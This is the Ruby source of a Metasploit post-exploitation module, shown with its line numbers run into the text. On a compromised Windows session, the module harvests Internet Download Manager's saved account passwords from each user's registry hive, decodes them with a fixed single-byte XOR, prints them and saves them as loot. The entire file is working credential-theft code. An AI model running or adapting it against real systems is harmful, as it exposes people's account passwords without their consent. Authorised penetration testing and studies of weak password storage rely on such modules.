Path: blob/master/modules/post/windows/gather/credentials/idm.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Registry7include Msf::Auxiliary::Report89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Windows Gather Internet Download Manager (IDM) Password Extractor',14'Description' => %q{15This module recovers the saved premium download account passwords from16Internet Download Manager (IDM). These passwords are stored in an encoded17format in the registry. This module traverses through these registry entries18and decodes them. Thanks to the template code of theLightCosine's CoreFTP19password module.20},21'License' => MSF_LICENSE,22'Author' => [23'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',24'Unknown', # SecurityXploded Team, www.SecurityXploded.com25],26'Platform' => [ 'win' ],27'SessionTypes' => [ 'meterpreter' ],28'Notes' => {29'Stability' => [CRASH_SAFE],30'SideEffects' => [],31'Reliability' => []32}33)34)35end3637def run38creds = Rex::Text::Table.new(39'Header' => 'Internet Downloader Manager Credentials',40'Indent' => 1,41'Columns' =>42[43'User',44'Password',45'Site'46]47)4849registry_enumkeys('HKU').each do |k|50next unless k.include?('S-1-5-21')51next if k.include?('_Classes')5253print_status("Looking at Key #{k}")5455begin56subkeys = registry_enumkeys("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\")5758if subkeys.nil? || subkeys.empty?59print_status('IDM not installed for this user.')60next61end6263subkeys.each do |site|64user = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", 'User')65epass = registry_getvaldata("HKU\\#{k}\\Software\\DownloadManager\\Passwords\\#{site}", 'EncPassword')66next if epass.nil? || (epass == '')6768pass = xor(epass)69print_good("Site: #{site} (User=#{user}, Password=#{pass})")70creds << [user, pass, site]71end7273print_status('Storing data...')74path = store_loot(75'idm.user.creds',76'text/csv',77session,78creds.to_csv,79'idm_user_creds.csv',80'Internet Download Manager User Credentials'81)82print_good("IDM user credentials saved in: #{path}")83rescue StandardError => e84print_error("An error has occurred: #{e}")85end86end87end8889def xor(ciphertext)90pass = ciphertext.unpack('C*')91key = 1592for i in 0..pass.length - 1 do93pass[i] ^= key94end95return pass.pack('C*')96end97end9899100